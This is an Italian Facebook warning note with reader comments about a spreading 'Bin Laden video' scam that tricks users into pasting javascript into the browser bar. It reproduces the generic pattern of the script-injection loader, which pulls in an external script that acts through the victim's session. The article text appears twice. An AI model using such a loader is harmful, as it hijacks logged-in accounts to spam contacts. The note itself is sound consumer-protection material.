Il filmato-che-non-esiste dilaga su FB. NON eseguite codici javascript, nè utilizzate CTRL+C e V.

Dilagano post e messaggi che promettono di mostrare un video INESISTENTE sulla cattura di BinLaden. Sebbene non siano al momento segnalati malware o virus collegati alla procedura, vediamo come funziona il meccanismo e soprattutto come sia possibile evitare problemi al proprio profilo.

Premessa

Alcune istruzioni javascript permettono di simulare funzioni non presenti nel social network, quali la selezione di tutti gli amici per suggerire pagine, iscrizioni a gruppi, eventi, etc. Sebbene siano efficaci nella selezione immediata dei propri contatti, ne sconsigliamo comunque l’uso per evitare un potenziale blocco del proprio account (vi sono procedure automatiche che classificano tali attività come spam).

Nello scrivere queste righe immaginiamo anche che un utente finale non sia in grado di riconoscere un codice maligno da uno benigno, quando gli viene richiesto di inserire una serie di parole nella barra del proprio browser…

Il problema

E’ stata segnalata la presenza di diverse pagine che invitano gli utenti a copiare-incollare un codice javascript nella barra del browser, ma anche solo di premere CTRL+C e V per effettuare un copia-incolla di codice nascosto.

Vengono promesse FALSE funzioni speciali quali:

– visualizzazioni di filmati o immagini INESISTENTI

– scoprire chi visita il proprio profilo

– “immagini rotanti” su FB

– invito automatico di tutti gli amici a usare una pagina

– aumento dei fan della propria pagina

– invio di richieste di amicizia

– raccolta di gift per giochi di vario genere

– crediti gratuiti a volontà

– …

Alcuni esempi pratici

Il codice si presenta SOLITAMENTE con queste caratteristiche:

javascript: /.../ (a=(b=document).createElement('script')).src=[link a procedura esterna in php o js],b.body.appendChild(a);void(0) /.../

Tramite alcune istruzioni in javascript, residenti su server o pc esterni al social network, è possibile automatizzare alcune operazioni come se fossero eseguite direttamente dal vostro profilo: invio di messaggi (spam o scam), MiPiace a pagine e applicazioni, aggiunta di tag ad amici, etc.

(al problema “aggiunta di amministratori” a proprie pagine, FB ha provveduto ad aggiungere la richiesta di password per effettuare modifiche)

Attivando tali procedure, viene richiesto SEMPRE un periodo di attesa, durante il quale la pagina (solitamente un sito web esterno a FB) esegue le “istruzioni” automatiche a nome vostro, come se foste voi a farle dalla vostra tastiera utilizzando le informazioni presenti nei vostri cookie (le variabili legate al vostro profilo e al vostro accesso).

Il fenomeno attualmente NON E’ CLASSIFICABILE COME PHISHING: non vi è il furto di credenziali di accesso, ma il vostro profilo, mentre siete collegati, esegue una serie di operazioni predefinite inviando messaggi in chat o tramite email, pubblicando post, mettendo MiPiace a pagine e/o applicazioni, etc).

Il pericolo maggiore consiste nel blocco del profilo da parte di FB, se il social network registra un’attività anomala per numero di azioni/pubblicazioni in un periodo di tempo relativamente breve.

E’ IMPORTANTE non cadere in queste trappole.

Se vi è capitato, controllate la lista delle vostre pagine preferite, e cancellate quelle non gradite (vedi nota).
Controllate anche, nelle impostazioni della vostra privacy, se sono presenti applicazioni sconosciute ed eliminatele; è una buona abitudine eliminare anche quelle che non utilizzate più (vedi nota)
Se venite reindirizzati a siti che richiedono l’inserimento del vostro numero di cellulare (o altri dati personali) per lo “sblocco” di opzioni aggiuntive ricordate DI NON INSERIRE MAI NULLA (come minimo vi trovate ad aver sottoscritto abbonamenti a suonerie per cellulari).

PER QUESTO VI INVITIAMO A NON UTILIZZARE ALCUN CODICE JAVASCRIPT SUGGERITO DA PROFILI, APPLICAZIONI O PAGINE (interne o esterne a Facebook).

P.S. Se gradite le nostre note, cliccate cortesemente su MiPiace e Condividi: capita infatti che alcuni individui le segnalino come offensive e le facciano sparire. Questa brutta abitudine è contrastabile SOLO manifestando il proprio gradimento tramite il MiPiace e la condivisione (se il gradimento è reale, naturalmente).

SeeYouSoon

Nota a cura di Claudio Cerroni (Hunch – Assistenza e Consulenza Informatica).

Iscriviti alla nostra PaginaAggiornamenti per essere sempre aggiornato sui problemi di Facebook.

CheckBlackList | PaginaAggiornamenti | News | Facebook | Toolbar | WorkingOn

Il codice si presenta SOLITAMENTE con queste caratteristiche:

javascript: /.../ (a=(b=document).createElement('script')).src=[link a procedura esterna in php o js],b.body.appendChild(a);void(0) /.../

Tramite alcune istruzioni in javascript, residenti su server o pc esterni al social network, è possibile automatizzare alcune operazioni come se fossero eseguite direttamente dal vostro profilo: invio di messaggi (spam o scam), MiPiace a pagine e applicazioni, aggiunta di tag ad amici, etc.

(al problema “aggiunta di amministratori” a proprie pagine, FB ha provveduto ad aggiungere la richiesta di password per effettuare modifiche)

Attivando tali procedure, viene richiesto SEMPRE un periodo di attesa, durante il quale la pagina (solitamente un sito web esterno a FB) esegue le “istruzioni” automatiche a nome vostro, come se foste voi a farle dalla vostra tastiera utilizzando le informazioni presenti nei vostri cookie (le variabili legate al vostro profilo e al vostro accesso).

Il fenomeno attualmente NON E’ CLASSIFICABILE COME PHISHING: non vi è il furto di credenziali di accesso, ma il vostro profilo, mentre siete collegati, esegue una serie di operazioni predefinite inviando messaggi in chat o tramite email, pubblicando post, mettendo MiPiace a pagine e/o applicazioni, etc).

Il pericolo maggiore consiste nel blocco del profilo da parte di FB, se il social network registra un’attività anomala per numero di azioni/pubblicazioni in un periodo di tempo relativamente breve.

E’ IMPORTANTE non cadere in queste trappole.

  • Se vi è capitato, controllate la lista delle vostre pagine preferite, e cancellate quelle non gradite (vedi nota).
  • Controllate anche, nelle impostazioni della vostra privacy, se sono presenti applicazioni sconosciute ed eliminatele; è una buona abitudine eliminare anche quelle che non utilizzate più (vedi nota)
  • Se venite reindirizzati a siti che richiedono l’inserimento del vostro numero di cellulare (o altri dati personali) per lo “sblocco” di opzioni aggiuntive ricordate DI NON INSERIRE MAI NULLA (come minimo vi trovate ad aver sottoscritto abbonamenti a suonerie per cellulari).

PER QUESTO VI INVITIAMO A NON UTILIZZARE ALCUN CODICE JAVASCRIPT SUGGERITO DA PROFILI, APPLICAZIONI O PAGINE (interne o esterne a Facebook).

P.S. Se gradite le nostre note, cliccate cortesemente su MiPiace e Condividi: capita infatti che alcuni individui le segnalino come offensive e le facciano sparire. Questa brutta abitudine è contrastabile SOLO manifestando il proprio gradimento tramite il MiPiace e la condivisione (se il gradimento è reale, naturalmente).

SeeYouSoon

Nota a cura di Claudio Cerroni (Hunch – Assistenza e Consulenza Informatica

).

Iscriviti alla nostra PaginaAggiornamenti per essere sempre aggiornato sui problemi di Facebook.

CheckBlackList | PaginaAggiornamenti | News | Facebook | Toolbar | WorkingOn

· · Condividi · Elimina

  • A te e altri 411 piace questo elemento.
    • Simona Loca Pistolera grazie

      04 maggio alle ore 11.23 ·
    • Mauro Varin bhe oddio è sempre meglio sapere per evitare 🙂

      04 maggio alle ore 11.26 ·
    • Lucia Mottura ciao!

      04 maggio alle ore 11.26 ·
    • Lucia Mottura

      scusate,avrei bisogno di un consiglio/chiarimento:ieri sera mi è stato postato da un amico (estero),con un suo (?) commento, in bacheca un filmato riguardante Bin Laden (ma mi pare di ricordarlo diverso da quello qui sopra). ora mi pare di Mostra altro
      04 maggio alle ore 11.35 ·

    • Luca Antonini grazie condivido ciao

      04 maggio alle ore 11.38 ·
    • CheckBlackList

      Solitamente non ci sono “VIRUS” associati a tali procedure ma, come spiegato in nota, il profilo esegue una serie di azioni all’insaputa di chi ha attivato il codice: invio di messaggi in chat, pubblicazione di post, creazione di eventi, etMostra altro
      04 maggio alle ore 11.45 · · 8 persone

    • Lia Renacci come al solito ho visto un sacco di post ke dicono che questo video contiene virus.il solito allarmismo..la gente poi clikka su tutto quello che vede

      04 maggio alle ore 11.46 ·
    • Rosanna Buonsante grazie, condivido volentieri…le bacheche di molti amici sono i”nfestate” dal post in questione!

      04 maggio alle ore 11.49 ·
    • Monica Dalboni grazie!

      04 maggio alle ore 11.50 ·
    • Alessandro Costa Copio e incollo!!!

      04 maggio alle ore 11.55 ·
    • Roberta Marone Grazie, condivido!

      04 maggio alle ore 12.22 ·
    • Grazia Paretti Grazie condivido anche se ci sono cascata come una pera!

      04 maggio alle ore 12.26 · · 1 persona
    • Katiuscia Di Ferdinando uno della mia amicizie cià cliccato e si è preso un trojan da quel video

      04 maggio alle ore 13.02 ·
    • Lucia Mottura Grazie Check!!! :-))) ♥

      04 maggio alle ore 13.35 ·
    • Rossella Crispini

      Stanotte c’è stata una vera e propria invasione sulle bacheche di questo link. Con un passaparola abbiamo cercato di avvertire più gente possibile di non aprirlo per limitarne la diffusione, anche se, in effetti, chi lo ha aperto ha fatto sMostra altro
      04 maggio alle ore 13.51 ·

    • Patrizia Barbierato grazie e condivido ……buon lavoro..!!!

      04 maggio alle ore 14.25 ·
    • Teresa Petrucci grazie!!!! condivido….

      04 maggio alle ore 15.05 ·
    • Lara Trusendi Quando ho provato ad aprirlo, ieri, mi ha rimandato alla home…

      04 maggio alle ore 15.28 ·
    • CheckBlackList

      Tranquillizzatevi. Le procedure di questo tipo, se attivate, si interrompono quando chiudete la pagina o il browser. Non si tratta di virus.
      Se avete mandato messaggi in chat o pubblicato sulle bacheche degli amici cercate semplicemente di lMostra altro
      04 maggio alle ore 15.45 · · 3 persone

    • KumDra Giuly Italia Grazie per l’info ♥

      04 maggio alle ore 16.31 ·
    • Lorella Poletti proprio stamattina qualcuno ha condiviso quel video sulla mia bacheca,ho cliccato più di una volta e il video non c’era,poisono andata a controllare il mio accaunt e ho notato che c’era una applicazione in più che non ho mai usato e allora l’ho cancellata subito..e ora cosa mi succede?’grazie se mi risponderete..!

      04 maggio alle ore 16.50 ·
    • CheckBlackList Non succede nulla. A volte fa più danni l’allarmismo per un “incredibile” pericolo che il pericolo stesso.

      04 maggio alle ore 17.16 · · 4 persone
    • Rossella Crispini infatti ora la mia home è intasata di link che mettono in allarme su questo terrificante virus!!!! 🙂

      04 maggio alle ore 18.15 ·
    • Luana Giunta nn sarà un virus ma un mio amico l’ha cliccato e ora ha impestato le bacheche dei suoi amici col video!

      04 maggio alle ore 18.48 ·
    • Davide Brugnone Un mio contatto ha postato sulla mia bacheca un presunto link che porta a vedere un video sull’esecuzione di Bin Laden. Premetto che il link è diverso da quello mostrato da voi in questa nota ma per sicurezza ho evitato di aprirlo comunque (anche se eviterei di visualizzarlo anche nell’eventualità in cui fosse vero). Come mi consigliate di comportarmi?

      04 maggio alle ore 19.28 ·
    • Paola Terribile Anche a me e’ successo. Non l’ho aperto. Poi sono andata sulla sua bacheca e ho letto che altri amici lo avevano avvertito della cosa e lui era piuttosto “allarmato” perche’ aveva spedito quel link a tutti i contatti…..comunque dev’essere andata bene. Io l’ho eliminato e ho visto anche lui, dietro consiglio di altri 🙂

      04 maggio alle ore 19.52 ·
    • Chakal Chatbouri ben laden didnt die beacuse we are all ben laden

      05 maggio alle ore 2.28 ·
    • Francesco F Petino Grazie, informazioni chiare ed esaustive …come sempre 😉

      05 maggio alle ore 10.23 ·
    • Luke Lightworker grazie!

      07 maggio alle ore 19.58 ·
    • Bettina Beba HO IL PROFILO BLOCCATOOOO…CHE FACCIO?? CHI MI PUò IUTAREEEEEE?? NON RIESCO ALEGGERE I MSG:::

      09 maggio alle ore 12.07 ·

Potrebbero interessarti anche...